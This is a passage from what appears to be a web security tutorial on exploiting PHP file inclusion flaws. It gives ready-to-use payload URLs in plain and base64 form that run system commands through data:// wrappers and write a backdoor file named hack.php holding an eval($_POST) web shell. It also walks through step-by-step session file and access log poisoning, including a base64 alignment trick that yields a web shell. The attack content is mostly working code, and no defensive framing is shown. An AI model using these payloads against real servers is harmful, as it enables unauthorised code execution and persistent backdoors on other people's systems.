&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;PHP version &amp;gt;= 5.2&lt;/li&gt;
&lt;li&gt;&lt;code&gt;allow_url_fopen = On&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;allow_url_include = On&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique 1:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;fileinclude.php?file=data:text/plain,&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;phpinfo&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdcsqtu9edc5awwyyj7br.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdcsqtu9edc5awwyyj7br.png" alt=" " width="800" height="338"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique 2 (Base64):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;data:text/plain&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nb"&gt;base64&lt;/span&gt;,PD9waHAgcGhwaW5mbygpOz8%2b
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;PD9waHAgcGhwaW5mbygpOz8+&lt;/code&gt; decodes to &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt;. The &lt;code&gt;+&lt;/code&gt; must be URL-encoded as &lt;code&gt;%2b&lt;/code&gt;; otherwise it is decoded as a space, the Base64 data is corrupted and an error occurs.&lt;/p&gt;

&lt;h4&gt;
  
  
  data:// (Command Execution)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Technique 1:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;fileinclude.php?file=data:text/plain,&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'whoami'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Technique 2 (Base64):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;data:text/plain&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nb"&gt;base64&lt;/span&gt;,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg&lt;span class="o"&gt;==&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Decodes to &lt;code&gt;&amp;lt;?php system('whoami');?&amp;gt;&lt;/code&gt;.&lt;/p&gt;

&lt;h4&gt;
  
  
  data:// (Writing a Trojan)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Technique 1:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;fileinclude.php?file=data:text/plain,&lt;span class="nt"&gt;&amp;lt;&lt;/span&gt;&lt;span class="err"&gt;?&lt;/span&gt;&lt;span class="na"&gt;php&lt;/span&gt; &lt;span class="na"&gt;fputs&lt;/span&gt;&lt;span class="err"&gt;(&lt;/span&gt;&lt;span class="na"&gt;fopen&lt;/span&gt;&lt;span class="err"&gt;('&lt;/span&gt;&lt;span class="na"&gt;hack.php&lt;/span&gt;&lt;span class="err"&gt;','&lt;/span&gt;&lt;span class="na"&gt;w&lt;/span&gt;&lt;span class="err"&gt;'),'&lt;/span&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="o"&gt;@&lt;/span&gt;&lt;span class="k"&gt;eval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;&lt;span class="err"&gt;');?&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F05ddl5cxl21nwzgdzoqx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F05ddl5cxl21nwzgdzoqx.png" alt=" " width="721" height="324"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique 2 (Base64):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;data:text/plain&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nb"&gt;base64&lt;/span&gt;,PD9waHAgZnB1dHMoZm9wZW4oJ2hhY2sucGhwJywndycpLCc8P3BocCBAZXZhbCgkX1BPU1Rbdl0pPz4nKTs/Pg&lt;span class="o"&gt;==&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Decodes to &lt;code&gt;&amp;lt;?php fputs(fopen('hack.php','w'),'&amp;lt;?php @eval($_POST[v])?&amp;gt;');?&amp;gt;&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Including Session Files
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt; The session file path is known, and the content is partially controllable.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The PHP session file save path can be found in &lt;code&gt;phpinfo&lt;/code&gt; under &lt;code&gt;session.save_path&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frqy9i9257hxb8feqfsg5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frqy9i9257hxb8feqfsg5.png" alt=" " width="800" height="99"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Common PHP session storage locations:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;code&gt;/var/lib/php/sess_PHPSESSID&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/var/lib/php/sess_PHPSESSID&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/tmp/sess_PHPSESSID&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/tmp/sessions/sess_PHPSESSID&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Session files are named &lt;code&gt;sess_[phpsessid]&lt;/code&gt;; the PHPSESSID value can be read from the Cookie header of the request.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0d3kp3apqgzurs7d1iaj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0d3kp3apqgzurs7d1iaj.png" alt=" " width="800" height="153"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To include and exploit the session file, the attacker must control part of its content; there is no general recipe. A common approach is to include the session file first, inspect its contents, and then identify which variables are controllable so that a payload can be injected and executed as PHP code.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Example 1:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Line 3&lt;/span&gt;
&lt;span class="nb"&gt;session_start&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_SESSION&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'username'&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nb"&gt;header&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'Location: index.php'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# Line 8&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'username'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'password'&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$username&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'username'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

    &lt;span class="c1"&gt;# Line 20&lt;/span&gt;
    &lt;span class="nv"&gt;$stmt&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;bind_result&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$res_password&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="c1"&gt;# Line 24&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$res_password&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nv"&gt;$password&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nv"&gt;$_SESSION&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'username'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;base64_encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$username&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="nb"&gt;header&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"location:index.php"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The variable &lt;code&gt;$username&lt;/code&gt; is user-controlled and is written to &lt;code&gt;$_SESSION&lt;/code&gt;. If this data is not filtered, it ends up in the session file on disk, which a file inclusion vulnerability can then load.&lt;/p&gt;

&lt;p&gt;To include the session file, its path must be known. Register a user (e.g., Johnson). After a successful login, note the PHPSESSID cookie value (e.g., &lt;code&gt;0d0385dc6a1067f4e3406191&lt;/code&gt;). Even a failed login creates a session file, because &lt;code&gt;session_start()&lt;/code&gt; runs before the credentials are checked.&lt;/p&gt;

&lt;p&gt;Visit:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;http://x.x.x.x/index.php?action&lt;span class="o"&gt;=&lt;/span&gt;/var/lib/php5/sess_0d0385dc6a1067f4e3406191
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;However, the username is stored base64-encoded. Using a pseudo-protocol to base64-decode the entire session file may produce garbled output because of the serialised prefix that precedes the value. The session file begins with a prefix such as &lt;code&gt;username|s:12:"&lt;/code&gt; (where &lt;code&gt;12&lt;/code&gt; is the length of the stored base64 string). For lengths below 100 this prefix is 15 characters long; for lengths from 100 to 999 it is 16 characters.&lt;/p&gt;

&lt;p&gt;A 16-character prefix lines up with base64's 4-character groups: 16 * 6 = 96 bits, and 96 mod 8 = 0. Thus, when base64-decoding the session file, the first 16 characters decode to garbage but do not shift the alignment of the remaining part (the base64-encoded username). Register a username like &lt;code&gt;JohnsonJohnson...&lt;/code&gt; (long enough that its base64 length exceeds 100) followed by &lt;code&gt;&amp;lt;?php eval($_GET['abcdefg']) ?&amp;gt;&lt;/code&gt;. Then visit:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="o"&gt;://&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;index&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="n"&gt;action&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt;&lt;span class="o"&gt;://&lt;/span&gt;&lt;span class="n"&gt;filter&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;convert&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;decode&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;resource&lt;/span&gt;&lt;span class="o"&gt;=/&lt;/span&gt;&lt;span class="k"&gt;var&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;lib&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;php5&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;sess_0d0385dc6a1067f4e3406191&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;abcdefg&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;phpinfo&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Successful execution leads to a web shell.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Example 2:&lt;/strong&gt;&lt;br&gt;
&lt;code&gt;session.php&lt;/code&gt; with controllable user session:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;session_start&lt;span class="o"&gt;()&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nv"&gt;$username&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'username'&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nv"&gt;$_SESSION&lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'username'&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$username&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Register a user with &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt; and log in with that username. Record PHPSESSID (e.g., &lt;code&gt;r7csmqpu1lul3elgsb6o9g6u1b&lt;/code&gt;). The session file contains the malicious code.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F55np44ugj8jqhv1g6cme.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F55np44ugj8jqhv1g6cme.png" alt=" " width="757" height="128"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Include it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="n"&gt;fileinclude&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nc"&gt;D&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="n"&gt;\phpStudy\PHPTutorial\tmp\tmp\sess_r7csmqpu1lul3elgsb6o9g6u1b&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnypwtr61ecqrp7nt921v.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnypwtr61ecqrp7nt921v.png" alt=" " width="800" height="164"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note on Command Execution and Trojan Writing:&lt;/strong&gt; Replace &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt; with the desired PHP code.&lt;/p&gt;

&lt;h3&gt;
  
  
  Including Log Files
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Access Logs
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt; Know the server log storage path, and log files must be readable.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Web servers (e.g., Apache) write requests to &lt;code&gt;access.log&lt;/code&gt; and errors to &lt;code&gt;error.log&lt;/code&gt;. Default paths:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight lua"&gt;&lt;code&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="n"&gt;Apache&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;Linux&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;etc&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;httpd&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;logs&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;access&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;log&lt;/span&gt; &lt;span class="ow"&gt;or&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;var&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;httpd&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;access&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;log&lt;/span&gt;
&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="n"&gt;Apache&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;Win2003&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;D&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;xampp&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;apache&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;logs&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;access&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;D&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;xampp&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;apache&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;logs&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;log&lt;/span&gt;
&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="n"&gt;IIS6&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;Win2003&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;C&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;WINDOWS&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;system32&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Logfiles&lt;/span&gt;
&lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="n"&gt;IIS7&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;Win2003&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt;&lt;span class="n"&gt;SystemDrive&lt;/span&gt;&lt;span class="o"&gt;%&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;inetpub&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;logs&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="n"&gt;LogFiles&lt;/span&gt;
&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="n"&gt;nginx&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;usr&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="kd"&gt;local&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;nginx&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;logs&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="ow"&gt;or&lt;/span&gt; &lt;span class="n"&gt;installation&lt;/span&gt; &lt;span class="n"&gt;directory&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Direct requests may cause encoding issues. Use Burp to modify the request, e.g., change &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt; to &lt;code&gt;%3C?php%20phpinfo();%20?%3E&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4ew6bidde3x5p74xk72z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4ew6bidde3x5p74xk72z.png" alt=" " width="800" height="299"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After writing PHP code to &lt;code&gt;/var/log/apache2/access.log&lt;/code&gt;, include it.&lt;/p&gt;

&lt;p&gt;Default configuration file paths:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;&lt;span class="p"&gt;1.&lt;/span&gt; Apache+Linux: /etc/httpd/conf/httpd.conf or /etc/init.d/httpd
&lt;span class="p"&gt;2.&lt;/span&gt; IIS6.0+Win2003: C:/Windows/system32/inetsrv/metabase.xml
&lt;span class="p"&gt;3.&lt;/span&gt; IIS7.0+WIN: C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\S&lt;/span&gt;ystem32&lt;span class="se"&gt;\i&lt;/span&gt;netsrv&lt;span class="se"&gt;\c&lt;/span&gt;onfig&lt;span class="se"&gt;\a&lt;/span&gt;pplicationHost.config
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Note on Command Execution and Trojan Writing:&lt;/strong&gt; Replace &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt; with the desired PHP code, encode as needed, and include.&lt;/p&gt;

&lt;h4&gt;
  
  
  SSH Log
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt; Know the SSH log location and have read access. Default: &lt;code&gt;/var/log/auth.log&lt;/code&gt; or &lt;code&gt;/var/log/secure&lt;/code&gt;.&lt;/p&gt;

